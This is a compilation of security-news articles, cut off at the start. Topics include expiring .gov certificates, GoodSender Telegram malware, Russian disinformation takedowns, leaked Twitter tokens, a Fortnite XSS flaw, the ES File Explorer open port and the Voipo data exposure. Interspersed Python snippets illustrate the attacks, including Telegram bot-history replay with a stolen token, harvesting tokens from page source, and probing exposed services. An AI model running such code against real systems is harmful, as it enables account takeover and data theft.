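    """Days until `expiry`; negative means the certificate has lapsed."""
    now = now or datetime.now(timezone.utc)
    return (expiry - now).days
```

Loop `cert_expiry` over the 18F domain list and sort by `days_left` and you get a table much like the one below.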
Why does it matter? Above all else, it’s an inconvenience. Depending on how long this shutdown lasts, it won’t take long before some of the big federal sites might start throwing errors and locking users out. That could also affect third-party sites and apps that rely on those federal sites for data, such as through a developer API.
Security, however, is less of a factor, despite claims to the contrary. Eric Mill, a security expert who recently left 18F, the government’s digital agency, said that fears over expired certificates have been overblown.
“The security risk to users is actually very low, since trusting a recently expired cert doesn’t in and of itself allow traffic to be intercepted,” he said in a recent tweet. Mill also noted that there’s little automation across the agencies, leading to certificates expiring and eventual downtime — a problem compounded when sites and departments are understaffed, and by the fact that each federal agency and department is responsible for its own website.
We’ve compiled the following list of domains that have and will expire during the period of the shutdown, from December 22 onwards — while removing dead links and defunct domains that no longer load. Some domains redirect to other domains that might have a certificate that expires next year, but the first domain will still fail on its expiry date.
Remember, if you see a domain that’s working past its expiry, check the certificate and it’s likely been renewed. If you see any errors, feel free to drop me an email.
In all, we’ve counted five expired federal domains already, 13 domains that will expire by the end of the month, and another 58 domains that’ll expire by the end of February.
Expired:
- disasterhousing.gov — December 28
- landimaging.gov — January 3
- earthsystemprediction.gov — January 11 — the National Earth System Prediction Capability
- manufacturing.gov — January 14 — a portal highlighting national manufacturing initiatives.
- nationalhousinglocator.gov — January 16
- scidac.gov — January 23
- ginniemae.gov — January 23
- reportband.gov — January 23
- mojavedata.gov — January 26
- congressionaldirectory.gov — January 30 — a redirect to the directory of Congress
- congressionalrecord.gov — January 30 — another redirect to the congressional record
- fdsys.gov — January 30
- housecalendar.gov — January 30 — a redirect to the House calendar
- presidentialdocuments.gov — January 30 — Compilation of Presidential Documents
- senatecalendar.gov — January 30 — a redirect to the Senate calendar
- uscode.gov — January 30
- donaciondeorganos.gov — January 30
- www.fishwatch.gov — January 30
- ferc.gov — February 1 — Federal Energy Regulatory Commission
- askkaren.gov — February 1
- befoodsafe.gov — February 1 — a redirecting link to the Department of Agriculture
- foodsafetyjobs.gov — February 1
- isitdoneyet.gov — February 1
- pregunteleakaren.gov — February 1
- www.democraticleader.gov — February 2 — website of the House majority leader
- majorityleader.gov — February 2 — redirecting link to the House majority’s page
- www.democraticwhip.gov — February 2 — website of the Congressional Democratic whip
- majoritywhip.gov — February 2 — redirecting link to Democratic whip’s page
- llnl.gov — February 2 — Lawrence Livermore National Laboratory
- moneyfactory.gov — February 6
- federalregister.gov — February 7 — the Federal Register
- wlci.gov — February 7
- fedrooms.gov — February 10
- floodsmart.gov — February 10 — the National Flood Insurance Program
- www.casl.gov — February 11
- geoplatform.gov — February 12 — the U.S. Geospatial Platform
- fatherhood.gov — February 13
- eeoc.gov — February 13 — the Equal Employment Opportunity Commission
- www.faa.gov — February 13 — the Federal Aviation Administration
- grants.gov — February 15
- indianaffairs.gov — February 15 — Department of the Interior’s Indian Affairs bureau
- jusfc.gov — February 15
- citizenscience.gov — February 16
- bia.gov — February 18 — another link to Indian Affairs
- presidentialinnovationfellows.gov — February 18
- usich.gov — February 18
- cdfifund.gov — February 18
- home.treasury.gov — February 18 — the end domain to the U.S. Treasury homepage
- financialstability.gov — February 18
- fsoc.gov — February 18
- irsauctions.gov — February 18
- irssales.gov — February 18
- makinghomeaffordable.gov — February 18
- mha.gov — February 18
- sigtarp.gov — February 18
- treas.gov — February 18
- ustreas.gov — February 18 — a redirect to the U.S. Treasury
- capnhq.gov — February 19 — another redirect link to the U.S. Treasury
- fdicseguro.gov — February 19
- sftool.gov — February 21
- nlm.gov — February 21 — the National Library of Medicine
- bea.gov — February 22
- opioids.gov — February 22 — the White House’s page on the opioids epidemic
- jamesmadison.gov — February 24
- usitc.gov — February 24 — the U.S. International Trade Commission
- arctic.gov — February 25
- inspire2serve.gov — February 26
- usaspending.gov — February 26
- everykidinapark.gov — February 26
- sec.gov — February 26 — the Securities and Exchange Commission
- everytrycounts.gov — February 27
- abandonedmines.gov — February 27
- malwareinvestigator.gov — February 28 — the FBI’s malware analysis site
- va.gov — February 28 — Department of Veterans Affairs
- code.gov — February 28 — Code.gov for Sharing America’s Code
All information was accurate as of January 17.
Sometimes it takes a small bug in one thing to find something massive elsewhere.
During a recent investigation, security firm Forcepoint Labs said it found a new kind of malware taking instructions from a hacker sending commands over the encrypted messaging app Telegram.
The researchers described their newly discovered malware, dubbed GoodSender, as a “fairly simple” Windows-based malware that’s about a year old, which uses Telegram as the method to listen and wait for commands. Once the malware infects its target, it creates a new administrator account and enables remote desktop — and waits. As soon as it has infected a machine, it sends the username and randomly generated password back to the hacker through Telegram.
It’s not the first time malware has used a commercial product to communicate with its operators. Hackers have hidden commands in pictures posted to Twitter and in comments left on celebrity Instagram posts.
But using an encrypted messenger makes it far harder to detect. At least, that’s the theory.
Forcepoint said in its research out Thursday that it only stumbled on the malware after it found a vulnerability in Telegram’s notoriously bad encryption.
End-to-end messages are encrypted using the app’s proprietary MTProto protocol, long slammed by cryptographers for leaking metadata and having flaws, and likened to “being stabbed in the eye with a fork.” Its bots, however, only use traditional TLS — or HTTPS — to communicate. The leaking metadata makes it easy to man-in-the-middle the connection and abuse the bot API, not only to read the messages a bot sends and receives but also to recover the full messaging history of the target bot, the researchers say.
When the researchers found the hacker using a Telegram bot to communicate with the malware, they dug in to learn more.
Fortunately, they were able to trace back the bot’s entire message history to the malware because each message had a unique message ID that increased incrementally, allowing the researchers to run a simple script to replay and scrape the bot’s conversation history.
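Forcepoint hasn't published its tooling, but the replay idea is simple to sketch. The Telegram Bot API's `forwardMessage` method takes a `message_id`; because IDs increase by one per message, walking them from 1 upward is one way to recover a bot's history into a chat the attacker controls. The sketch below is our own illustration of that idea (the HTTP call is injectable so it can be exercised without the network):

```python
import json
import urllib.parse
import urllib.request

def call_bot_api(token, method, params):
    """POST one Telegram Bot API call and return the decoded JSON response."""
    url = f"https://api.telegram.org/bot{token}/{method}"
    data = urllib.parse.urlencode(params).encode()
    with urllib.request.urlopen(url, data=data) as resp:
        return json.load(resp)

def replay_history(token, source_chat, dest_chat, max_id, call=call_bot_api):
    """Forward messages 1..max_id from the bot's chat to one we control.

    Sequential IDs mean a linear walk recovers the conversation in order;
    IDs that never existed or were deleted simply come back ok=False.
    """
    recovered = []
    for message_id in range(1, max_id + 1):
        resp = call(token, "forwardMessage", {
            "chat_id": dest_chat,
            "from_chat_id": source_chat,
            "message_id": message_id,
        })
        if resp.get("ok"):
            recovered.append(resp["result"])
    return recovered
```

The only secret required is the bot token — which, in this case, the researchers could lift off the wire.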
“This meant that we could track [the hacker’s] first steps towards creating and deploying the malware all the way through to current campaigns in the form of communications to and from both victims and test machines,” the researchers said.
Your bot uncovered, your malware discovered — what can make it worse for the hacker? The researchers know who they are.
Because the hacker didn’t have a clear separation between their development and production workspaces, the researchers say they could track the malware author because they used their own computer and didn’t mask their IP address.
The researchers could also see exactly what commands the malware would listen to: take screenshots, remove or download files, get IP address data, copy whatever’s in the clipboard, and even restart the PC.
But the researchers don’t have all the answers. How did the malware get onto victim computers in the first place? They suspect the hacker used the so-called EternalBlue exploit, a hacking tool designed to target Windows computers, developed by and stolen from the National Security Agency, to gain access to unpatched computers. And they don’t know how many victims there are, except that there are likely more than 120 in the U.S., followed by Vietnam, India, and Australia.
Forcepoint informed Telegram of the vulnerability. TechCrunch also reached out to Telegram’s founder and chief executive Pavel Durov for comment, but didn’t hear back.
If there’s a lesson to learn? Be careful using bots on Telegram — and certainly don’t use Telegram for your malware.
Two years on from the U.S. presidential election, Facebook continues to have a major problem with Russian disinformation being megaphoned via its social tools.
In a blog post today the company reveals another tranche of Kremlin-linked fake activity — saying it’s removed a total of 471 Facebook pages and accounts, as well as 41 Instagram accounts, which were being used to spread propaganda in regions where Putin’s regime has sharp geopolitical interests.
In its latest reveal of “coordinated inauthentic behavior” — aka the euphemism Facebook uses for disinformation campaigns that rely on its tools to generate a veneer of authenticity and plausibility in order to pump out masses of sharable political propaganda — the company says it identified two operations, both originating in Russia, and both using similar tactics without any apparent direct links between the two networks.
One operation was targeting Ukraine specifically, while the other was active in a number of countries in the Baltics, Central Asia, the Caucasus, and Central and Eastern Europe.
“We’re taking down these Pages and accounts based on their behavior, not the content they post,” writes Facebook’s Nathaniel Gleicher, head of cybersecurity policy. “In these cases, the people behind this activity coordinated with one another and used fake accounts to misrepresent themselves, and that was the basis for our action.”
Sputnik link
Discussing the Russian disinformation op targeting multiple countries, Gleicher says Facebook found what looked like innocuous or general interest pages to be linked to employees of Kremlin propaganda outlet Sputnik, with some of the pages encouraging protest movements and pushing other Putin lines.
“The Page administrators and account owners primarily represented themselves as independent news Pages or general interest Pages on topics like weather, travel, sports, economics, or politicians in Romania, Latvia, Estonia, Lithuania, Armenia, Azerbaijan, Georgia, Tajikistan, Uzbekistan, Kazakhstan, Moldova, Russia, and Kyrgyzstan,” he writes. “Despite their misrepresentations of their identities, we found that these Pages and accounts were linked to employees of Sputnik, a news agency based in Moscow, and that some of the Pages frequently posted about topics like anti-NATO sentiment, protest movements, and anti-corruption.”
Facebook has included some sample posts from the removed accounts in the blog which show a mixture of imagery being deployed — from a photo of a rock concert, to shots of historic buildings and a snowy scene, to obviously militaristic and political protest imagery.
In all Facebook says it removed 289 Pages and 75 Facebook accounts associated with this Russian disop; adding that around 790,000 accounts followed one or more of the removed Pages.
It also reveals that it received around $135,000 for ads run by the Russian operators (specifying this was paid for in euros, rubles, and U.S. dollars).
“The first ad ran in October 2013, and the most recent ad ran in January 2019,” it notes, adding: “We have not completed a review of the organic content coming from these accounts.”
These Kremlin-linked Pages also hosted around 190 events — with the first scheduled for August 2015, according to Facebook, and the most recent scheduled for January 2019. “Up to 1,200 people expressed interest in at least one of these events. We cannot confirm whether any of these events actually occurred,” it further notes.
Facebook adds that open source reporting and work by partners which investigate disinformation helped identify the network. (For more on the open source investigation check out this blog post from DFRLab.)
It also says it has shared information about the investigation with U.S. law enforcement, the U.S. Congress, other technology companies, and policymakers in impacted countries.
Ukraine tip-off
In the case of the Ukraine-targeted Russian disop, Facebook says it removed a total of 107 Facebook Pages, Groups, and accounts, and 41 Instagram accounts, specifying that it was acting on an initial tip off from U.S. law enforcement.
In all, it says around 180,000 Facebook accounts were following one or more of the removed pages, while the fake Instagram accounts were followed by more than 55,000 accounts.
Again Facebook received money from the disinformation purveyors, saying it took in around $25,000 in ad spending on Facebook and Instagram in this case — all paid for in rubles this time — with the first ad running in January 2018, and the most recent in December 2018. (Again it says it has not completed a review of content the accounts were generating.)
“The individuals behind these accounts primarily represented themselves as Ukrainian, and they operated a variety of fake accounts while sharing local Ukrainian news stories on a variety of topics, such as weather, protests, NATO, and health conditions at schools,” writes Gleicher. “We identified some technical overlap with Russia-based activity we saw prior to the US midterm elections, including behavior that shared characteristics with previous Internet Research Agency (IRA) activity.”
In the Ukraine case it says it found no Events being hosted by the pages.
“Our security efforts are ongoing to help us stay a step ahead and uncover this kind of abuse, particularly in light of important political moments and elections in Europe this year,” adds Gleicher. “We are committed to making improvements and building stronger partnerships around the world to more effectively detect and stop this activity.”
A month ago Facebook also revealed it had removed another batch of politically motivated fake accounts. In that case the network behind the pages had been working to spread misinformation in Bangladesh 10 days before the country’s general elections.
This week it also emerged the company is extending some of its nascent election security measures by bringing in requirements for political advertisers to more international markets ahead of major elections in the coming months, such as checks that a political advertiser is located in the country.
However, in other countries that also have big votes looming this year, Facebook has yet to announce any measures to combat politically charged fakes.
The plugin, Social Network Tabs, was storing so-called account access tokens in the source code of the WordPress website. Anyone who viewed the source code could see the linked Twitter handle and the access tokens. These access tokens keep you logged in to the website on your phone and your computer without having to re-type your password every time or entering your two-factor authentication code.
But if stolen, most sites can’t differentiate between a token used by the account owner, or a hacker who stole the token.
Baptiste Robert, a French security researcher who goes by the online handle Elliot Alderson, found the vulnerability and shared details with TechCrunch.
In order to test the bug, Robert found 539 websites using the vulnerable code by searching PublicWWW, a website source code search engine. He then wrote a proof-of-concept script that scraped the publicly available code from the affected websites, collecting access tokens on more than 400 linked Twitter accounts.
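Because the leaked data sat in plain HTML, "collecting" it amounts to a regex over each page's source. A minimal sketch of that step — the parameter names and token shapes below are illustrative assumptions on our part; the plugin's actual markup may differ:

```python
import re

# Hypothetical pattern: Twitter access tokens look like "<user_id>-<base62>",
# and the secret is a long alphanumeric string embedded alongside it.
TOKEN_RE = re.compile(
    r"oauth_token=(\d+-[A-Za-z0-9]+)&oauth_token_secret=([A-Za-z0-9]+)"
)

def extract_credentials(html):
    """Return every (access_token, token_secret) pair exposed in page source."""
    return TOKEN_RE.findall(html)
```

With a pair in hand, confirming "read/write" scope is a single authenticated API call — which is exactly what Robert's favoriting test did.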
Using the obtained access tokens, Robert tested their permissions by directing those accounts to ‘favorite’ a tweet of his choosing over a hundred times. This confirmed that the exposed account keys had “read/write” access — effectively giving him, or a malicious hacker, complete control over the Twitter accounts.
The vulnerable accounts included a couple of verified Twitter users, several accounts with tens of thousands of followers, a Florida sheriff’s office, a casino in Oklahoma, an outdoor music venue in Cincinnati, and more.
Robert told Twitter on December 1 of the vulnerability in the third-party plugin, prompting the social media giant to revoke the keys, rendering the accounts safe again. Twitter also emailed the affected users about the security lapse of the WordPress plugin, but did not comment on the record when reached.
Twitter did its part — what little it could do when the security issue is out of its hands. Any WordPress user still using the plugin should remove it immediately, change their Twitter password, and ensure that the app is removed from Twitter’s connected apps to invalidate the token.
Design Chemical, a Bangkok-based software house that developed the buggy plugin, did not return a request for comment when contacted prior to publication.
On its website, it says the seven-year-old plugin has been downloaded more than 53,000 times. The plugin, last updated in 2013, still gets dozens of downloads each day.
With one click, any semi-skilled hacker could have silently taken over a Fortnite account, according to a cybersecurity firm who says the bug is now fixed.
Researchers at Check Point say the three vulnerabilities chained together could have affected any of its 200 million players. The flaws, if exploited, would have stolen the account access token set on the gamer’s device once they’ve entered their password.
Once stolen, that token could be used to impersonate the gamer and log in as if they were the account holder, without needing their password.
The researchers say that the flaw lies in how Epic Games, the maker of Fortnite, handles login requests. Researchers said they could send any user a crafted link that appears to come from Epic Games’ own domain and steal an access token needed to break into an account.
“It’s important to remember that the URL is coming from an Epic Games domain, so it’s transparent to the user and any security filter will not suspect anything,” said Oded Vanunu, Check Point’s head of products vulnerability research, in an email to TechCrunch.
Here’s how it works: the user clicks on a link pointing to an epicgames.com subdomain, into which the hacker has injected malicious code hosted on their own server by exploiting a cross-site scripting weakness in the subdomain. Once the malicious script loads, unbeknownst to the Fortnite player, it steals their account token and sends it back to the hacker.
“If the victim user is not logged into the game, he or she would have to login first,” said Vanunu. “Once that person is logged in, the account can be stolen.”
Epic Games has since fixed the vulnerability.
“We were made aware of the vulnerabilities and they were soon addressed,” said Nick Chester, a spokesperson for Epic Games. “We thank Check Point for bringing this to our attention.”
“As always, we encourage players to protect their accounts by not re-using passwords and using strong passwords, and not sharing account information with others,” he said.
When asked, Epic Games would not say if user data or accounts were compromised as a result of this vulnerability.
What do you get when you put one internet-connected device on top of another? A little more control than you otherwise would, in the case of Alias, the “teachable parasite” — an IoT smart speaker topper made by two designers, Bjørn Karmann and Tore Knudsen.
The Raspberry Pi-powered, fungus-inspired blob’s mission is to whisper sweet nonsense into Amazon Alexa’s (or Google Home’s) always-on ear so it can’t accidentally snoop on your home.
Alias will only stop feeding noise into its host’s speakers when it hears its own wake command — which can be whatever you like.
The middleman IoT device has its own local neural network, allowing its owner to christen it with a name (or sound) of their choosing via a training interface in a companion app.
The open source TensorFlow library was used for building the name training component.
So instead of having to say “Alexa” or “Ok Google” to talk to a commercial smart speaker — and thus being stuck parroting a big tech brand name in your own home, not to mention being saddled with a device that’s always vulnerable to vocal pranks (and worse: accidental wiretapping) — you get to control what the wake word is, thereby taking back a modicum of control over a natively privacy-hostile technology.
This means you could rename Alexa “Bezosallseeingeye”, or refer to your Google Home as “Carelesswhispers”. Whatever floats your boat.
Once Alias hears its custom wake command it will stop feeding noise into the host speaker — enabling the underlying smart assistant to hear and respond to commands as normal.
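Stripped of the audio plumbing, that behavior is a two-state loop: jam until the custom wake word fires, then go quiet and let audio through to the assistant. A toy sketch of the state machine, with detection abstracted to a callable (the real project runs a small local neural network there):

```python
def alias_loop(frames, is_wake_word, jam, passthrough):
    """Toy model of Alias's control loop.

    `frames` yields audio chunks; `is_wake_word` is the detector; `jam`
    and `passthrough` are callbacks driving the speaker sitting on top
    of the host device's microphones.
    """
    listening = False
    for frame in frames:
        if not listening and is_wake_word(frame):
            listening = True       # custom wake word heard: stop jamming
            passthrough(frame)
        elif listening:
            passthrough(frame)     # let the command reach the assistant
        else:
            jam(frame)             # keep whispering noise into the mic
```

The real device also has to re-arm itself after each command; this sketch leaves that out for brevity.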
“We looked at how cordyceps fungus and viruses can appropriate and control insects to fulfill their own agendas and were inspired to create our own parasite for smart home systems,” explain Karmann and Knudsen in a write up of the project here. “Therefore we started Project Alias to demonstrate how maker-culture can be used to redefine our relationship with smart home technologies, by delegating more power from the designers to the end users of the products.”
Alias offers a glimpse of a richly creative custom future for IoT, as the means of producing custom but still powerful connected technology products becomes more affordable and accessible.
And so also perhaps a partial answer to IoT’s privacy problem, for those who don’t want to abstain entirely. (Albeit, on the security front, more custom and controllable IoT does increase the hackable surface area — so that’s another element to bear in mind; more custom controls for greater privacy does not necessarily mesh with robust device security.)
Project Alias is of course not a solution to the underlying tracking problem of smart assistants — which harvest insights gleaned from voice commands to further flesh out interest profiles of users, including for ad targeting purposes.
That would require either proper privacy regulation or, er, a new kind of software virus that infiltrates the host system and prevents it from accessing user data. And — unlike this creative physical IoT add-on — that kind of tech would not be at all legal.
Why is one of the most popular Android apps running a hidden web server in the background?
ES File Explorer claims it has racked up more than 500 million downloads since 2014, making it one of the most widely used Android apps. Its simplicity makes it what it is: a file explorer that lets you browse your Android phone or tablet's file system for files, data, documents and more.
But behind the scenes, the app is running a slimmed-down web server on the device. In doing so, it opens up the entire Android device to a whole host of attacks — including data theft.
Baptiste Robert, a French security researcher who goes by the online handle Elliot Alderson, found the exposed port last week, and disclosed his findings in several tweets on Wednesday. Prior to tweeting, he showed TechCrunch how the exposed port could be used to silently exfiltrate data from the device.
“All connected devices on the local network can get [data] installed on the device,” he said.
Using a simple script he wrote, Robert demonstrated how he could pull pictures, videos, and app names — or even grab a file from the memory card — from another device on the same network. The script even allows an attacker to remotely launch an app on the victim’s device.
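Public write-ups of the flaw describe a JSON-over-HTTP interface listening on the open port. As a hedged illustration, this is roughly what such a probe looks like; the port number (59777) and command names come from those public disclosures rather than from Robert's script, and the host address is hypothetical:

```python
import json
import urllib.request

# Port and command format reported in public disclosures of the flaw
# (assumptions for illustration, not confirmed in this article).
ES_PORT = 59777

def build_request(host: str, command: str) -> urllib.request.Request:
    """Build the JSON-over-HTTP request the exposed service reportedly accepts."""
    payload = json.dumps({"command": command}).encode()
    return urllib.request.Request(
        f"http://{host}:{ES_PORT}/",
        data=payload,
        headers={"Content-Type": "application/json"},
        method="POST",
    )

# Commands reportedly supported include listFiles, listPics and getDeviceInfo.
req = build_request("192.168.1.23", "listFiles")
print(req.full_url)       # http://192.168.1.23:59777/
print(req.data.decode())  # {"command": "listFiles"}
```

No authentication is involved at any point — any device that can reach the phone on the local network can send these requests.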
He sent over his script for us to test, and we verified his findings using a spare Android phone. Robert said app versions 4.1.9.7.4 and below have the open port.
“It’s clearly not good,” he said.
We contacted the makers of ES File Explorer but did not hear back prior to publication. If that changes, we’ll update.
The obvious caveat is that the chances of exploitation are slim, given that this isn't an attack anyone on the internet can perform. A would-be attacker has to be on the same network as the victim — typically the same Wi-Fi network. But that also means any malicious app on any device on that network that knows how to exploit the vulnerability could pull data from a device running ES File Explorer and send it along to another server, so long as it has network permissions.
Some have suggested a reasonable explanation: the server is used to stream video to other apps over HTTP. Others who found the same exposed port in the past found it alarming. The app itself says it allows you to "manage files on your phone from your computer… when this feature is enabled."
But most probably don’t realize that the open port leaves them exposed from the moment that they open the app.
While the DoD is in the process of reviewing the $10 billion JEDI cloud contract RFPs (assuming the work continues during the government shutdown), Microsoft continues to build up its federal government security bona fides, regardless.
Today the company announced it has achieved the highest level of federal government clearance for the Outlook mobile app, allowing U.S. Government Community Cloud (GCC) High and Department of Defense employees to use the mobile app. This is on top of FedRAMP compliance, which the company achieved last year.
“To meet the high level of government security and compliance requirements, we updated the Outlook mobile architecture so that it establishes a direct connection between the Outlook mobile app and the compliant Exchange Online backend services using a native Microsoft sync technology and removes middle tier services,” the company wrote in a blog post announcing the update.
The update will allow these highly security-conscious employees to access some of the more recent additions to Outlook mobile, such as the ability to add a comment when canceling an event.
This is in line with government security updates the company made last year. While none of these changes are specifically designed to help win the $10 billion JEDI cloud contract, they certainly help make a case for Microsoft from a technology standpoint.
As Microsoft corporate vice president for Azure Julia White stated in a blog post last year, which we covered: "Moving forward, we are simplifying our approach to regulatory compliance for federal agencies, so that our government customers can gain access to innovation more rapidly." The Outlook mobile release is clearly in line with that.
Today’s announcement comes after the Pentagon announced just last week that it has awarded Microsoft a separate large contract for $1.7 billion. This involves providing Microsoft Enterprise Services for the Department of Defense (DoD), Coast Guard and the intelligence community, according to a statement from DoD.
All of this comes ahead of a decision on the massive $10 billion, winner-take-all cloud contract. Final RFPs were submitted in October and the DoD is expected to make a decision in April. The process has not been without controversy, with Oracle and IBM submitting formal protests even before the RFP deadline — and more recently, Oracle filing a lawsuit alleging the contract terms violate federal procurement laws. Oracle has been particularly concerned that the contract was designed to favor Amazon, a point the DoD has repeatedly denied.
An unprotected server storing millions of call logs and text messages was left open for months before they were found by a security researcher.
If you thought you'd heard this story before, you're not wrong. Back in November, another communications company, Voxox, exposed a database containing millions of text messages — including password resets and two-factor codes.
This time around, it’s a different company: Voipo, a Lake Forest, California communications provider, exposed tens of gigabytes worth of customer data.
Security researcher Justin Paine found the exposed database last week and reached out to the company's chief technology officer. The database was pulled offline before Paine had even told him where to look.
Voipo is a voice-over-internet provider, providing residential and business phone line services that they can control themselves in the cloud. The company’s backend routes calls and processes text messages for its users. But because one of the backend ElasticSearch databases wasn’t protected with a password, anyone could look in and see streams of real-time call logs and text messages sent back and forth.
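An exposed Elasticsearch instance needs no exploit at all: by default the service answers unauthenticated HTTP on port 9200, so a single GET request returns stored documents. A minimal sketch of what "anyone could look in" means in practice (the hostname is hypothetical):

```python
import json
import urllib.request

def search_url(host: str, size: int = 10) -> str:
    """URL for an unauthenticated Elasticsearch search — no credentials
    are needed when the cluster is exposed without a password."""
    return f"http://{host}:9200/_search?size={size}"

def fetch_logs(host: str):
    # A single GET returns documents from every index on the cluster.
    with urllib.request.urlopen(search_url(host), timeout=5) as resp:
        return json.loads(resp.read())["hits"]["hits"]

print(search_url("db.example.internal"))
# http://db.example.internal:9200/_search?size=10
```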
It’s one of the largest data breaches of the year — so far — totaling close to seven million call logs, six million text messages, and other internal documents containing unencrypted passwords that if used could have allowed an attacker to gain deep access to the company’s systems.
TechCrunch reviewed some of the data, and found web addresses in the logs pointed directly to customer login pages. (We didn’t use the credentials as doing so would be unlawful.)
Paine said, and noted in his write-up, that the database had been exposed since June 2018 and contained call and message logs dating back to May 2015. He told TechCrunch that the logs were updated daily and went up to January 8 — the day the database was pulled offline. Many of the files contained highly detailed call records of who called whom, the time and date, and more.
Some of the numbers in the call logs were scrubbed, Paine said, but the text message logs included the sender, the recipient, and the message itself.
Similar to the Voxox breach last year, Paine said that any intercepted text messages containing two-factor codes or password reset links could have "allowed the attacker to bypass [two-factor] on the user's account," as he put it in his write-up. (Another good reason why you should upgrade to app-based authentication.)
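App-based authentication sidesteps SMS interception because the one-time code never travels over the network at all: it is computed locally from a shared secret and the clock, per RFC 6238. A minimal sketch using only the Python standard library, checked against the RFC's published test vector:

```python
import hashlib
import hmac
import struct
import time

def totp(secret: bytes, t=None, digits: int = 6, step: int = 30) -> str:
    """RFC 6238 TOTP: derive a one-time code from a shared secret and the
    current time, so there is no SMS in transit for an attacker to intercept."""
    if t is None:
        t = int(time.time())
    counter = struct.pack(">Q", t // step)            # 8-byte big-endian time step
    digest = hmac.new(secret, counter, hashlib.sha1).digest()
    offset = digest[-1] & 0x0F                        # dynamic truncation (RFC 4226)
    code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)

# RFC 6238 test vector: secret "12345678901234567890", T = 59, 8 digits
print(totp(b"12345678901234567890", t=59, digits=8))  # 94287082
```

Authenticator apps such as Google Authenticator implement exactly this scheme, which is why a database leak of SMS traffic never exposes their codes.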
But Paine didn’t extensively search the records, mindful of customers’ privacy.
The logs also contained credentials that permitted access to Voipo’s provider of E911 services, which allows emergency services to know a person’s pre-registered location based on their phone number. Worse, he said, E911 services could have been disabled, rendering those customers unable to use the service in an emergency.
Another file contained a list of network appliance devices with usernames and passwords in plaintext. A cursory review showed that the files and logs contained a meticulously detailed and invasive insight into a person or company’s business, who they’re talking to and often for what reason.
Yet, none of the data was encrypted.
In an email, Voipo chief executive Timothy Dick confirmed the data exposure, adding that this was “a development server and not part of our production network.” Paine disputes this, given the specifics and scale of the data exposed.
TechCrunch also has no reason to believe that the data is not real customer data.
Dick told TechCrunch: “Almost immediately after he reached out to let us know the dev server was exposed, we took it offline and investigated and corrected the issue.” He added: “At this time though, we have not found any evidence in logs or on our network to indicate that a data breach occurred.”
Despite asking several times, Dick did not say how the company concluded that nobody else accessed the data.
Dick also said: "All of our systems are behind firewalls and similar and don't even allow external connections except from internal servers so even if hostnames were listed, it would not be possible to connect and our logs do not show any connections." (When we checked, many of the internal systems with IP or web addresses loaded — even though we were outside of the alleged firewall.)
However, in an email to Paine, Dick conceded that some of the data on the server “does appear to be valid.”
Dick didn’t commit to notifying the authorities of the exposure under state data breach notification laws.
“We will continue to investigate and if we do find any evidence of a breach or anything in our logs that indicate one, we will of course take appropriate actions to address it [and] make notifications,” he said.
DuckDuckGo has a new, unlikely partner in search: Apple.
The privacy-focused search engine that promises to never track its users said Tuesday it’s now using data provided by Apple Maps to power its map-based search results. Although DuckDuckGo had provided limited mapping results for a while using data from open-source service OpenStreetMap, it never scaled its features to those of its search engine rivals, notably Google and Bing.
Now, DuckDuckGo will return addresses, businesses, geographical locations, and nearby places using Apple Maps by default. (When we tested, directions and transit times opened in Apple Maps on our Mac, iPhone, and iPad — but on non-Apple devices, directions default to and open in Bing.)
In using Apple’s mapping data, DuckDuckGo will become one of the biggest users of Apple Maps to date, six months after Apple said it would open up Apple Maps, long only available on Macs, iPhones and iPads, to the web.
“We’re excited to work closely with Apple to set a new standard of trust online, and we hope you’ll enjoy this update,” said the search engine in a blog post.
In reality, the partnership isn’t that surprising at all.
Apple faced flak for ditching Google Maps in iOS and rushing its overhauled Maps service out to the market, prompting a rare mea culpa from chief executive Tim Cook, apologizing for the disastrous rollout. At its most recent Worldwide Developers Conference in June, Apple promised a do-over, offering reliability and stability — but more importantly, privacy.
Where Google tracks everything you do, where you go and what you search for, Apple has long said it doesn’t want to know. Any data that Apple collects is anonymous, said Eddy Cue, Apple internet software and services chief, in an interview with TechCrunch last year. “We specifically don’t collect data, even from point A to point B,” said Cue. By anonymizing the data, Apple doesn’t know where you came from or where you went, or even who took the trip.
DuckDuckGo finally brings a much-needed feature to the search engine, while keeping true to its privacy-focused roots as a non-tracking search rival to Google.
“You are still anonymous when you perform map and address-related searches on DuckDuckGo,” the search engine said.
In a separate note, DuckDuckGo said users can turn on their location for better “nearby” search results, but promises not to store the data or use it for any other purpose. “Even if you opt-in to sharing a more accurate location, your searches will still be completely anonymous,” said DuckDuckGo.
“We do not send any personally identifiable information such as IP address to Apple or other third parties,” the company said.
DuckDuckGo processes 30 million daily searches, up by more than 50 percent year-over-year, the company said last year.